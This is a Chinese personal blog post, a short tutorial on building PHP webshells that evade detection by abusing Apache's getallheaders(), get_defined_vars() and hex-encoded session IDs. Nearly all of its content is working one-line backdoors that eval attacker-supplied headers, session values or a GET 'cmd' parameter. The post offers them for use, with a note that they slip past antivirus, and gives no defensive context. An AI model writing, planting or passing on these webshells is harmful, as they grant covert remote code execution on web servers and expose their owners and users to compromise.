• 欢迎访问惜文个人博客
  • 本博客最新公告:本站已经支持使用QQ和GitHub帐号快捷登录啦!
  • 访问本站建议使用火狐和谷歌浏览器哦!
  • 不知道要写什么哈哈
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏惜文博客吧
  • 源码模板插件免费下载,传送门:点我去看看传说中的安全之家!

PHP利用Apache、Nginx的特性实现免杀Webshell

网络安全 惜 文 1年前 (2019-03-07) 1462次浏览 0个评论 扫描二维码
文章目录[隐藏]

通过get_defined_vars()getallheaders()这两个函数来构造我们的webshell。

环境 函数 利用
nginx get_defined_vars() 返回由所有已定义变量所组成的数组
apache getallheaders() 获取全部 HTTP 请求头信息

apache环境

<?php
eval(next(getallheaders())); 
?>

PHP利用Apache、Nginx的特性实现免杀Webshell

apache和nginx环境通用

<?php
eval(implode(reset(get_defined_vars())));
?>

PHP利用Apache、Nginx的特性实现免杀Webshell
另外一种通过执行伪造的sessionid值,进行任意代码执行。

<?php
eval(hex2bin(session_id(session_start())));
?>

PHP利用Apache、Nginx的特性实现免杀Webshell
706870696e666f28293b这个是phpinfo();的hex编码。

给shell加密码

<?php eval(get_defined_vars()['_GET']['cmd']);?>

惜文博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:PHP利用Apache、Nginx的特性实现免杀Webshell
喜欢 (0)
[白白]
分享 (0)
惜 文
关于作者:
感觉自己萌萌哒,啦啦啦,个人说明也没啥可写
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址